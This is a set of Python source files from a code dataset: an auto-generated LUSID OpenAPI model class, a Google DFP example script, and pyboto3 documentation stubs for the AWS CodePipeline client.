Failure| | | <a name=\"370\">370</a>|Result Retrieval Failure| | | <a name=\"371\">371</a>|Result Processing Failure| | | <a name=\"372\">372</a>|Vendor Result Processing Failure| | | <a name=\"373\">373</a>|Vendor Result Mapping Failure| | | <a name=\"374\">374</a>|Vendor Library Unauthorised| | | <a name=\"375\">375</a>|Vendor Connectivity Error| | | <a name=\"376\">376</a>|Vendor Interface Error| | | <a name=\"377\">377</a>|Vendor Pricing Failure| | | <a name=\"378\">378</a>|Vendor Translation Failure| | | <a name=\"379\">379</a>|Vendor Key Mapping Failure| | | <a name=\"380\">380</a>|Vendor Reflection Failure| | | <a name=\"390\">390</a>|Attempt To Upsert Duplicate Quotes| | | <a name=\"391\">391</a>|Corporate Action Source Does Not Exist| | | <a name=\"392\">392</a>|Corporate Action Source Already Exists| | | <a name=\"393\">393</a>|Instrument Identifier Already In Use| | | <a name=\"394\">394</a>|Properties Not Found| | | <a name=\"395\">395</a>|Batch Operation Aborted| | | <a name=\"400\">400</a>|Invalid Iso4217 Currency Code| | | <a name=\"401\">401</a>|Cannot Assign Instrument Identifier To Currency| | | <a name=\"402\">402</a>|Cannot Assign Currency Identifier To Non Currency| | | <a name=\"403\">403</a>|Currency Instrument Cannot Be Deleted| | | <a name=\"404\">404</a>|Currency Instrument Cannot Have Economic Definition| | | <a name=\"405\">405</a>|Currency Instrument Cannot Have Lookthrough Portfolio| | | <a name=\"406\">406</a>|Cannot Create Currency Instrument With Multiple Identifiers| | | <a name=\"407\">407</a>|Specified Currency Is Undefined| | | <a name=\"410\">410</a>|Index Does Not Exist| | | <a name=\"411\">411</a>|Sort Field Does Not Exist| | | <a name=\"413\">413</a>|Negative Pagination Parameters| | | <a name=\"414\">414</a>|Invalid Search Syntax| | | <a name=\"415\">415</a>|Filter Execution Timeout| | | <a name=\"420\">420</a>|Side Definition Inconsistent| | | <a name=\"450\">450</a>|Invalid Quote Access Metadata Rule| | | <a name=\"451\">451</a>|Access Metadata Not Found| | | <a name=\"452\">452</a>|Invalid Access Metadata Identifier| | | <a name=\"460\">460</a>|Standard Resource Not Found| | | <a name=\"461\">461</a>|Standard Resource Conflict| | | <a name=\"462\">462</a>|Calendar Not Found| | | <a name=\"463\">463</a>|Date In A Calendar Not Found| | | <a name=\"464\">464</a>|Invalid Date Source Data| | | <a name=\"465\">465</a>|Invalid Timezone| | | <a name=\"601\">601</a>|Person Identifier Already In Use| | | <a name=\"602\">602</a>|Person Not Found| | | <a name=\"603\">603</a>|Cannot Set Identifier| | | <a name=\"617\">617</a>|Invalid Recipe Specification In Request| | | <a name=\"618\">618</a>|Inline Recipe Deserialisation Failure| | | <a name=\"619\">619</a>|Identifier Types Not Set For Entity| | | <a name=\"620\">620</a>|Cannot Delete All Client Defined Identifiers| | | <a name=\"650\">650</a>|The Order requested was not found.| | | <a name=\"654\">654</a>|The Allocation requested was not found.| | | <a name=\"655\">655</a>|Cannot build the fx forward target with the given holdings.| | | <a name=\"656\">656</a>|Group does not contain expected entities.| | | <a name=\"667\">667</a>|Relation definition already exists| | | <a name=\"673\">673</a>|Missing entitlements for entities in Group| | | <a name=\"674\">674</a>|Next Best Action not found| | | <a name=\"676\">676</a>|Relation definition not defined| | | <a name=\"677\">677</a>|Invalid entity identifier for relation| | | <a name=\"681\">681</a>|Sorting by specified field not supported|One or more of the provided fields to order by were either invalid or not supported. | | <a name=\"682\">682</a>|Too many fields to sort by|The number of fields to sort the data by exceeds the number allowed by the endpoint | | <a name=\"684\">684</a>|Sequence Not Found| | | <a name=\"685\">685</a>|Sequence Already Exists| | | <a name=\"686\">686</a>|Non-cycling sequence has been exhausted| | | <a name=\"687\">687</a>|Legal Entity Identifier Already In Use| | | <a name=\"688\">688</a>|Legal Entity Not Found| | | <a name=\"689\">689</a>|The supplied pagination token is invalid| | | <a name=\"690\">690</a>|Property Type Is Not Supported| | | <a name=\"691\">691</a>|Multiple Tax-lots For Currency Type Is Not Supported| | # noqa: E501
The version of the OpenAPI document: 0.11.2220
Contact: info@finbourne.com
Generated by: https://openapi-generator.tech
"""
import pprint
import re # noqa: F401
import six
class UpdatePropertyDefinitionRequest(object):
"""NOTE: This class is auto generated by OpenAPI Generator.
Ref: https://openapi-generator.tech
Do not edit the class manually.
"""
"""
Attributes:
openapi_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
required_map (dict): The key is attribute name
and the value is whether it is 'required' or 'optional'.
"""
openapi_types = {
'display_name': 'str',
'property_description': 'str'
}
attribute_map = {
'display_name': 'displayName',
'property_description': 'propertyDescription'
}
required_map = {
'display_name': 'required',
'property_description': 'optional'
}
def __init__(self, display_name=None, property_description=None): # noqa: E501
"""
UpdatePropertyDefinitionRequest - a model defined in OpenAPI
:param display_name: The display name of the property. (required)
:type display_name: str
:param property_description: Describes the property
:type property_description: str
""" # noqa: E501
self._display_name = None
self._property_description = None
self.discriminator = None
self.display_name = display_name
self.property_description = property_description
@property
def display_name(self):
"""Gets the display_name of this UpdatePropertyDefinitionRequest. # noqa: E501
The display name of the property. # noqa: E501
:return: The display_name of this UpdatePropertyDefinitionRequest. # noqa: E501
:rtype: str
"""
return self._display_name
@display_name.setter
def display_name(self, display_name):
"""Sets the display_name of this UpdatePropertyDefinitionRequest.
The display name of the property. # noqa: E501
:param display_name: The display_name of this UpdatePropertyDefinitionRequest. # noqa: E501
:type: str
"""
if display_name is None:
raise ValueError("Invalid value for `display_name`, must not be `None`") # noqa: E501
self._display_name = display_name
@property
def property_description(self):
"""Gets the property_description of this UpdatePropertyDefinitionRequest. # noqa: E501
Describes the property # noqa: E501
:return: The property_description of this UpdatePropertyDefinitionRequest. # noqa: E501
:rtype: str
"""
return self._property_description
@property_description.setter
def property_description(self, property_description):
"""Sets the property_description of this UpdatePropertyDefinitionRequest.
Describes the property # noqa: E501
:param property_description: The property_description of this UpdatePropertyDefinitionRequest. # noqa: E501
:type: str
"""
if property_description is not None and len(property_description) > 100:
raise ValueError("Invalid value for `property_description`, length must be less than or equal to `100`") # noqa: E501
self._property_description = property_description
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.openapi_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, UpdatePropertyDefinitionRequest):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| 209.1 | 28,439 | 0.690638 |
795c7f0cfc73a36d9db7b8e35933a25d8690cb36 | 2,038 | py | Python | examples/dfp/v201611/content_metadata_key_hierarchy_service/get_all_content_metadata_key_hierarchies.py | agencia-watermelons/googleads-python-lib | d2e55863ecf7e5090c225d74b3f4c1f948cd5a21 | [
"Apache-2.0"
] | null | null | null | examples/dfp/v201611/content_metadata_key_hierarchy_service/get_all_content_metadata_key_hierarchies.py | agencia-watermelons/googleads-python-lib | d2e55863ecf7e5090c225d74b3f4c1f948cd5a21 | [
"Apache-2.0"
] | null | null | null | examples/dfp/v201611/content_metadata_key_hierarchy_service/get_all_content_metadata_key_hierarchies.py | agencia-watermelons/googleads-python-lib | d2e55863ecf7e5090c225d74b3f4c1f948cd5a21 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/python
#
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example gets all content metadata key hierarchies.
"""
# Import appropriate modules from the client library.
from googleads import dfp
def main(client):
# Initialize appropriate service.
content_metadata_key_hierarchy_service = client.GetService(
'ContentMetadataKeyHierarchyService', version='v201611')
# Create a statement to select content metadata key hierarchies.
statement = dfp.FilterStatement()
# Retrieve a small amount of content metadata key hierarchies at a time,
# paging through until all content metadata key hierarchies have been
# retrieved.
while True:
response = (
content_metadata_key_hierarchy_service
.getContentMetadataKeyHierarchiesByStatement(
statement.ToStatement()))
if 'results' in response:
for content_metadata_key_hierarchy in response['results']:
# Print out some information for each content metadata key hierarchy.
print('Content metadata key hierarchy with ID "%d" and name "%s" was '
'found.\n' % (content_metadata_key_hierarchy['id'],
content_metadata_key_hierarchy['name']))
statement.offset += dfp.SUGGESTED_PAGE_LIMIT
else:
break
print '\nNumber of results found: %s' % response['totalResultSetSize']
if __name__ == '__main__':
# Initialize client object.
dfp_client = dfp.DfpClient.LoadFromStorage()
main(dfp_client)
| 36.392857 | 78 | 0.728656 |
795c7ffcd8f783bf2f39a42165e9c46e1ce5446a | 69,136 | py | Python | pyboto3/codepipeline.py | thecraftman/pyboto3 | 653a0db2b00b06708334431da8f169d1f7c7734f | [
"MIT"
] | null | null | null | pyboto3/codepipeline.py | thecraftman/pyboto3 | 653a0db2b00b06708334431da8f169d1f7c7734f | [
"MIT"
] | null | null | null | pyboto3/codepipeline.py | thecraftman/pyboto3 | 653a0db2b00b06708334431da8f169d1f7c7734f | [
"MIT"
] | null | null | null | '''
The MIT License (MIT)
Copyright (c) 2016 WavyCloud
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
SOFTWARE.
'''
def acknowledge_job(jobId=None, nonce=None):
"""
Returns information about a specified job and whether that job has been received by the job worker. Only used for custom actions.
See also: AWS API Documentation
:example: response = client.acknowledge_job(
jobId='string',
nonce='string'
)
:type jobId: string
:param jobId: [REQUIRED]
The unique system-generated ID of the job for which you want to confirm receipt.
:type nonce: string
:param nonce: [REQUIRED]
A system-generated random number that AWS CodePipeline uses to ensure that the job is being worked on by only one job worker. Get this number from the response of the PollForJobs request that returned this job.
:rtype: dict
:return: {
'status': 'Created'|'Queued'|'Dispatched'|'InProgress'|'TimedOut'|'Succeeded'|'Failed'
}
"""
pass
def acknowledge_third_party_job(jobId=None, nonce=None, clientToken=None):
"""
Confirms a job worker has received the specified job. Only used for partner actions.
See also: AWS API Documentation
:example: response = client.acknowledge_third_party_job(
jobId='string',
nonce='string',
clientToken='string'
)
:type jobId: string
:param jobId: [REQUIRED]
The unique system-generated ID of the job.
:type nonce: string
:param nonce: [REQUIRED]
A system-generated random number that AWS CodePipeline uses to ensure that the job is being worked on by only one job worker. Get this number from the response to a GetThirdPartyJobDetails request.
:type clientToken: string
:param clientToken: [REQUIRED]
The clientToken portion of the clientId and clientToken pair used to verify that the calling entity is allowed access to the job and its details.
:rtype: dict
:return: {
'status': 'Created'|'Queued'|'Dispatched'|'InProgress'|'TimedOut'|'Succeeded'|'Failed'
}
"""
pass
def can_paginate(operation_name=None):
"""
Check if an operation can be paginated.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is create_foo, and you'd normally invoke the
operation as client.create_foo(**kwargs), if the
create_foo operation can be paginated, you can use the
call client.get_paginator('create_foo').
"""
pass
def create_custom_action_type(category=None, provider=None, version=None, settings=None, configurationProperties=None, inputArtifactDetails=None, outputArtifactDetails=None):
"""
Creates a new custom action that can be used in all pipelines associated with the AWS account. Only used for custom actions.
See also: AWS API Documentation
:example: response = client.create_custom_action_type(
category='Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
provider='string',
version='string',
settings={
'thirdPartyConfigurationUrl': 'string',
'entityUrlTemplate': 'string',
'executionUrlTemplate': 'string',
'revisionUrlTemplate': 'string'
},
configurationProperties=[
{
'name': 'string',
'required': True|False,
'key': True|False,
'secret': True|False,
'queryable': True|False,
'description': 'string',
'type': 'String'|'Number'|'Boolean'
},
],
inputArtifactDetails={
'minimumCount': 123,
'maximumCount': 123
},
outputArtifactDetails={
'minimumCount': 123,
'maximumCount': 123
}
)
:type category: string
:param category: [REQUIRED]
The category of the custom action, such as a build action or a test action.
Note
Although Source and Approval are listed as valid values, they are not currently functional. These values are reserved for future use.
:type provider: string
:param provider: [REQUIRED]
The provider of the service used in the custom action, such as AWS CodeDeploy.
:type version: string
:param version: [REQUIRED]
The version identifier of the custom action.
:type settings: dict
:param settings: Returns information about the settings for an action type.
thirdPartyConfigurationUrl (string) --The URL of a sign-up page where users can sign up for an external service and perform initial configuration of the action provided by that service.
entityUrlTemplate (string) --The URL returned to the AWS CodePipeline console that provides a deep link to the resources of the external system, such as the configuration page for an AWS CodeDeploy deployment group. This link is provided as part of the action display within the pipeline.
executionUrlTemplate (string) --The URL returned to the AWS CodePipeline console that contains a link to the top-level landing page for the external system, such as console page for AWS CodeDeploy. This link is shown on the pipeline view page in the AWS CodePipeline console and provides a link to the execution entity of the external action.
revisionUrlTemplate (string) --The URL returned to the AWS CodePipeline console that contains a link to the page where customers can update or change the configuration of the external action.
:type configurationProperties: list
:param configurationProperties: The configuration properties for the custom action.
Note
You can refer to a name in the configuration properties of the custom action within the URL templates by following the format of {Config:name}, as long as the configuration property is both required and not secret. For more information, see Create a Custom Action for a Pipeline .
(dict) --Represents information about an action configuration property.
name (string) -- [REQUIRED]The name of the action configuration property.
required (boolean) -- [REQUIRED]Whether the configuration property is a required value.
key (boolean) -- [REQUIRED]Whether the configuration property is a key.
secret (boolean) -- [REQUIRED]Whether the configuration property is secret. Secrets are hidden from all calls except for GetJobDetails, GetThirdPartyJobDetails, PollForJobs, and PollForThirdPartyJobs.
When updating a pipeline, passing * * * * * without changing any other values of the action will preserve the prior value of the secret.
queryable (boolean) --Indicates that the proprety will be used in conjunction with PollForJobs. When creating a custom action, an action can have up to one queryable property. If it has one, that property must be both required and not secret.
If you create a pipeline with a custom action type, and that custom action contains a queryable property, the value for that configuration property is subject to additional restrictions. The value must be less than or equal to twenty (20) characters. The value can contain only alphanumeric characters, underscores, and hyphens.
description (string) --The description of the action configuration property that will be displayed to users.
type (string) --The type of the configuration property.
:type inputArtifactDetails: dict
:param inputArtifactDetails: [REQUIRED]
Returns information about the details of an artifact.
minimumCount (integer) -- [REQUIRED]The minimum number of artifacts allowed for the action type.
maximumCount (integer) -- [REQUIRED]The maximum number of artifacts allowed for the action type.
:type outputArtifactDetails: dict
:param outputArtifactDetails: [REQUIRED]
Returns information about the details of an artifact.
minimumCount (integer) -- [REQUIRED]The minimum number of artifacts allowed for the action type.
maximumCount (integer) -- [REQUIRED]The maximum number of artifacts allowed for the action type.
:rtype: dict
:return: {
'actionType': {
'id': {
'category': 'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
'owner': 'AWS'|'ThirdParty'|'Custom',
'provider': 'string',
'version': 'string'
},
'settings': {
'thirdPartyConfigurationUrl': 'string',
'entityUrlTemplate': 'string',
'executionUrlTemplate': 'string',
'revisionUrlTemplate': 'string'
},
'actionConfigurationProperties': [
{
'name': 'string',
'required': True|False,
'key': True|False,
'secret': True|False,
'queryable': True|False,
'description': 'string',
'type': 'String'|'Number'|'Boolean'
},
],
'inputArtifactDetails': {
'minimumCount': 123,
'maximumCount': 123
},
'outputArtifactDetails': {
'minimumCount': 123,
'maximumCount': 123
}
}
}
"""
pass
def create_pipeline(pipeline=None):
"""
Creates a pipeline.
See also: AWS API Documentation
:example: response = client.create_pipeline(
pipeline={
'name': 'string',
'roleArn': 'string',
'artifactStore': {
'type': 'S3',
'location': 'string',
'encryptionKey': {
'id': 'string',
'type': 'KMS'
}
},
'stages': [
{
'name': 'string',
'blockers': [
{
'name': 'string',
'type': 'Schedule'
},
],
'actions': [
{
'name': 'string',
'actionTypeId': {
'category': 'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
'owner': 'AWS'|'ThirdParty'|'Custom',
'provider': 'string',
'version': 'string'
},
'runOrder': 123,
'configuration': {
'string': 'string'
},
'outputArtifacts': [
{
'name': 'string'
},
],
'inputArtifacts': [
{
'name': 'string'
},
],
'roleArn': 'string'
},
]
},
],
'version': 123
}
)
:type pipeline: dict
:param pipeline: [REQUIRED]
Represents the structure of actions and stages to be performed in the pipeline.
name (string) -- [REQUIRED]The name of the action to be performed.
roleArn (string) -- [REQUIRED]The Amazon Resource Name (ARN) for AWS CodePipeline to use to either perform actions with no actionRoleArn, or to use to assume roles for actions with an actionRoleArn.
artifactStore (dict) -- [REQUIRED]The Amazon S3 location where artifacts are stored for the pipeline. If this Amazon S3 bucket is created manually, it must meet the requirements for AWS CodePipeline. For more information, see the Concepts .
type (string) -- [REQUIRED]The type of the artifact store, such as S3.
location (string) -- [REQUIRED]The location for storing the artifacts for a pipeline, such as an S3 bucket or folder.
encryptionKey (dict) --The encryption key used to encrypt the data in the artifact store, such as an AWS Key Management Service (AWS KMS) key. If this is undefined, the default key for Amazon S3 is used.
id (string) -- [REQUIRED]The ID used to identify the key. For an AWS KMS key, this is the key ID or key ARN.
type (string) -- [REQUIRED]The type of encryption key, such as an AWS Key Management Service (AWS KMS) key. When creating or updating a pipeline, the value must be set to 'KMS'.
stages (list) -- [REQUIRED]The stage in which to perform the action.
(dict) --Represents information about a stage and its definition.
name (string) -- [REQUIRED]The name of the stage.
blockers (list) --Reserved for future use.
(dict) --Reserved for future use.
name (string) -- [REQUIRED]Reserved for future use.
type (string) -- [REQUIRED]Reserved for future use.
actions (list) -- [REQUIRED]The actions included in a stage.
(dict) --Represents information about an action declaration.
name (string) -- [REQUIRED]The action declaration's name.
actionTypeId (dict) -- [REQUIRED]The configuration information for the action type.
category (string) -- [REQUIRED]A category defines what kind of action can be taken in the stage, and constrains the provider type for the action. Valid categories are limited to one of the values below.
owner (string) -- [REQUIRED]The creator of the action being called.
provider (string) -- [REQUIRED]The provider of the service being called by the action. Valid providers are determined by the action category. For example, an action in the Deploy category type might have a provider of AWS CodeDeploy, which would be specified as CodeDeploy.
version (string) -- [REQUIRED]A string that identifies the action type.
runOrder (integer) --The order in which actions are run.
configuration (dict) --The action declaration's configuration.
(string) --
(string) --
outputArtifacts (list) --The name or ID of the result of the action declaration, such as a test or build artifact.
(dict) --Represents information about the output of an action.
name (string) -- [REQUIRED]The name of the output of an artifact, such as 'My App'.
The input artifact of an action must exactly match the output artifact declared in a preceding action, but the input artifact does not have to be the next action in strict sequence from the action that provided the output artifact. Actions in parallel can declare different output artifacts, which are in turn consumed by different following actions.
Output artifact names must be unique within a pipeline.
inputArtifacts (list) --The name or ID of the artifact consumed by the action, such as a test or build artifact.
(dict) --Represents information about an artifact to be worked on, such as a test or build artifact.
name (string) -- [REQUIRED]The name of the artifact to be worked on, for example, 'My App'.
The input artifact of an action must exactly match the output artifact declared in a preceding action, but the input artifact does not have to be the next action in strict sequence from the action that provided the output artifact. Actions in parallel can declare different output artifacts, which are in turn consumed by different following actions.
roleArn (string) --The ARN of the IAM service role that will perform the declared action. This is assumed through the roleArn for the pipeline.
version (integer) --The version number of the pipeline. A new pipeline always has a version number of 1. This number is automatically incremented when a pipeline is updated.
:rtype: dict
:return: {
'pipeline': {
'name': 'string',
'roleArn': 'string',
'artifactStore': {
'type': 'S3',
'location': 'string',
'encryptionKey': {
'id': 'string',
'type': 'KMS'
}
},
'stages': [
{
'name': 'string',
'blockers': [
{
'name': 'string',
'type': 'Schedule'
},
],
'actions': [
{
'name': 'string',
'actionTypeId': {
'category': 'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
'owner': 'AWS'|'ThirdParty'|'Custom',
'provider': 'string',
'version': 'string'
},
'runOrder': 123,
'configuration': {
'string': 'string'
},
'outputArtifacts': [
{
'name': 'string'
},
],
'inputArtifacts': [
{
'name': 'string'
},
],
'roleArn': 'string'
},
]
},
],
'version': 123
}
}
:returns:
(string) --
(string) --
"""
pass
def delete_custom_action_type(category=None, provider=None, version=None):
"""
Marks a custom action as deleted. PollForJobs for the custom action will fail after the action is marked for deletion. Only used for custom actions.
See also: AWS API Documentation
:example: response = client.delete_custom_action_type(
category='Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
provider='string',
version='string'
)
:type category: string
:param category: [REQUIRED]
The category of the custom action that you want to delete, such as source or deploy.
:type provider: string
:param provider: [REQUIRED]
The provider of the service used in the custom action, such as AWS CodeDeploy.
:type version: string
:param version: [REQUIRED]
The version of the custom action to delete.
"""
pass
def delete_pipeline(name=None):
"""
Deletes the specified pipeline.
See also: AWS API Documentation
:example: response = client.delete_pipeline(
name='string'
)
:type name: string
:param name: [REQUIRED]
The name of the pipeline to be deleted.
"""
pass
def disable_stage_transition(pipelineName=None, stageName=None, transitionType=None, reason=None):
"""
Prevents artifacts in a pipeline from transitioning to the next stage in the pipeline.
See also: AWS API Documentation
:example: response = client.disable_stage_transition(
pipelineName='string',
stageName='string',
transitionType='Inbound'|'Outbound',
reason='string'
)
:type pipelineName: string
:param pipelineName: [REQUIRED]
The name of the pipeline in which you want to disable the flow of artifacts from one stage to another.
:type stageName: string
:param stageName: [REQUIRED]
The name of the stage where you want to disable the inbound or outbound transition of artifacts.
:type transitionType: string
:param transitionType: [REQUIRED]
Specifies whether artifacts will be prevented from transitioning into the stage and being processed by the actions in that stage (inbound), or prevented from transitioning from the stage after they have been processed by the actions in that stage (outbound).
:type reason: string
:param reason: [REQUIRED]
The reason given to the user why a stage is disabled, such as waiting for manual approval or manual tests. This message is displayed in the pipeline console UI.
"""
pass
def enable_stage_transition(pipelineName=None, stageName=None, transitionType=None):
"""
Enables artifacts in a pipeline to transition to a stage in a pipeline.
See also: AWS API Documentation
:example: response = client.enable_stage_transition(
pipelineName='string',
stageName='string',
transitionType='Inbound'|'Outbound'
)
:type pipelineName: string
:param pipelineName: [REQUIRED]
The name of the pipeline in which you want to enable the flow of artifacts from one stage to another.
:type stageName: string
:param stageName: [REQUIRED]
The name of the stage where you want to enable the transition of artifacts, either into the stage (inbound) or from that stage to the next stage (outbound).
:type transitionType: string
:param transitionType: [REQUIRED]
Specifies whether artifacts will be allowed to enter the stage and be processed by the actions in that stage (inbound) or whether already-processed artifacts will be allowed to transition to the next stage (outbound).
"""
pass
def generate_presigned_url(ClientMethod=None, Params=None, ExpiresIn=None, HttpMethod=None):
"""
Generate a presigned url given a client, its method, and arguments
:type ClientMethod: string
:param ClientMethod: The client method to presign for
:type Params: dict
:param Params: The parameters normally passed to
ClientMethod.
:type ExpiresIn: int
:param ExpiresIn: The number of seconds the presigned url is valid
for. By default it expires in an hour (3600 seconds)
:type HttpMethod: string
:param HttpMethod: The http method to use on the generated url. By
default, the http method is whatever is used in the method's model.
"""
pass
def get_job_details(jobId=None):
"""
Returns information about a job. Only used for custom actions.
See also: AWS API Documentation
:example: response = client.get_job_details(
jobId='string'
)
:type jobId: string
:param jobId: [REQUIRED]
The unique system-generated ID for the job.
:rtype: dict
:return: {
'jobDetails': {
'id': 'string',
'data': {
'actionTypeId': {
'category': 'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
'owner': 'AWS'|'ThirdParty'|'Custom',
'provider': 'string',
'version': 'string'
},
'actionConfiguration': {
'configuration': {
'string': 'string'
}
},
'pipelineContext': {
'pipelineName': 'string',
'stage': {
'name': 'string'
},
'action': {
'name': 'string'
}
},
'inputArtifacts': [
{
'name': 'string',
'revision': 'string',
'location': {
'type': 'S3',
's3Location': {
'bucketName': 'string',
'objectKey': 'string'
}
}
},
],
'outputArtifacts': [
{
'name': 'string',
'revision': 'string',
'location': {
'type': 'S3',
's3Location': {
'bucketName': 'string',
'objectKey': 'string'
}
}
},
],
'artifactCredentials': {
'accessKeyId': 'string',
'secretAccessKey': 'string',
'sessionToken': 'string'
},
'continuationToken': 'string',
'encryptionKey': {
'id': 'string',
'type': 'KMS'
}
},
'accountId': 'string'
}
}
"""
pass
def get_paginator(operation_name=None):
"""
Create a paginator for an operation.
:type operation_name: string
:param operation_name: The operation name. This is the same name
as the method name on the client. For example, if the
method name is create_foo, and you'd normally invoke the
operation as client.create_foo(**kwargs), if the
create_foo operation can be paginated, you can use the
call client.get_paginator('create_foo').
:rtype: L{botocore.paginate.Paginator}
"""
pass
def get_pipeline(name=None, version=None):
"""
Returns the metadata, structure, stages, and actions of a pipeline. Can be used to return the entire structure of a pipeline in JSON format, which can then be modified and used to update the pipeline structure with UpdatePipeline .
See also: AWS API Documentation
:example: response = client.get_pipeline(
name='string',
version=123
)
:type name: string
:param name: [REQUIRED]
The name of the pipeline for which you want to get information. Pipeline names must be unique under an Amazon Web Services (AWS) user account.
:type version: integer
:param version: The version number of the pipeline. If you do not specify a version, defaults to the most current version.
:rtype: dict
:return: {
'pipeline': {
'name': 'string',
'roleArn': 'string',
'artifactStore': {
'type': 'S3',
'location': 'string',
'encryptionKey': {
'id': 'string',
'type': 'KMS'
}
},
'stages': [
{
'name': 'string',
'blockers': [
{
'name': 'string',
'type': 'Schedule'
},
],
'actions': [
{
'name': 'string',
'actionTypeId': {
'category': 'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
'owner': 'AWS'|'ThirdParty'|'Custom',
'provider': 'string',
'version': 'string'
},
'runOrder': 123,
'configuration': {
'string': 'string'
},
'outputArtifacts': [
{
'name': 'string'
},
],
'inputArtifacts': [
{
'name': 'string'
},
],
'roleArn': 'string'
},
]
},
],
'version': 123
}
}
:returns:
(string) --
(string) --
"""
pass
def get_pipeline_execution(pipelineName=None, pipelineExecutionId=None):
"""
Returns information about an execution of a pipeline, including details about artifacts, the pipeline execution ID, and the name, version, and status of the pipeline.
See also: AWS API Documentation
:example: response = client.get_pipeline_execution(
pipelineName='string',
pipelineExecutionId='string'
)
:type pipelineName: string
:param pipelineName: [REQUIRED]
The name of the pipeline about which you want to get execution details.
:type pipelineExecutionId: string
:param pipelineExecutionId: [REQUIRED]
The ID of the pipeline execution about which you want to get execution details.
:rtype: dict
:return: {
'pipelineExecution': {
'pipelineName': 'string',
'pipelineVersion': 123,
'pipelineExecutionId': 'string',
'status': 'InProgress'|'Succeeded'|'Superseded'|'Failed',
'artifactRevisions': [
{
'name': 'string',
'revisionId': 'string',
'revisionChangeIdentifier': 'string',
'revisionSummary': 'string',
'created': datetime(2015, 1, 1),
'revisionUrl': 'string'
},
]
}
}
:returns:
InProgress: The pipeline execution is currently running.
Succeeded: The pipeline execution completed successfully.
Superseded: While this pipeline execution was waiting for the next stage to be completed, a newer pipeline execution caught up and continued through the pipeline instead.
Failed: The pipeline did not complete successfully.
"""
pass
def get_pipeline_state(name=None):
"""
Returns information about the state of a pipeline, including the stages and actions.
See also: AWS API Documentation
:example: response = client.get_pipeline_state(
name='string'
)
:type name: string
:param name: [REQUIRED]
The name of the pipeline about which you want to get information.
:rtype: dict
:return: {
'pipelineName': 'string',
'pipelineVersion': 123,
'stageStates': [
{
'stageName': 'string',
'inboundTransitionState': {
'enabled': True|False,
'lastChangedBy': 'string',
'lastChangedAt': datetime(2015, 1, 1),
'disabledReason': 'string'
},
'actionStates': [
{
'actionName': 'string',
'currentRevision': {
'revisionId': 'string',
'revisionChangeId': 'string',
'created': datetime(2015, 1, 1)
},
'latestExecution': {
'status': 'InProgress'|'Succeeded'|'Failed',
'summary': 'string',
'lastStatusChange': datetime(2015, 1, 1),
'token': 'string',
'lastUpdatedBy': 'string',
'externalExecutionId': 'string',
'externalExecutionUrl': 'string',
'percentComplete': 123,
'errorDetails': {
'code': 'string',
'message': 'string'
}
},
'entityUrl': 'string',
'revisionUrl': 'string'
},
],
'latestExecution': {
'pipelineExecutionId': 'string',
'status': 'InProgress'|'Failed'|'Succeeded'
}
},
],
'created': datetime(2015, 1, 1),
'updated': datetime(2015, 1, 1)
}
"""
pass
def get_third_party_job_details(jobId=None, clientToken=None):
"""
Requests the details of a job for a third party action. Only used for partner actions.
See also: AWS API Documentation
:example: response = client.get_third_party_job_details(
jobId='string',
clientToken='string'
)
:type jobId: string
:param jobId: [REQUIRED]
The unique system-generated ID used for identifying the job.
:type clientToken: string
:param clientToken: [REQUIRED]
The clientToken portion of the clientId and clientToken pair used to verify that the calling entity is allowed access to the job and its details.
:rtype: dict
:return: {
'jobDetails': {
'id': 'string',
'data': {
'actionTypeId': {
'category': 'Source'|'Build'|'Deploy'|'Test'|'Invoke'|'Approval',
'owner': 'AWS'|'ThirdParty'|'Custom',
'provider': 'string',
'version': 'string'
},
'actionConfiguration': {
'configuration': {
'string': 'string'
}
},
'pipelineContext': {
'pipelineName': 'string',
'stage': {
'name': 'string'
},
'action': {
'name': 'string'
}
},
'inputArtifacts': [
{
'name': 'string',
'revision': 'string',
'location': {
'type': 'S3',
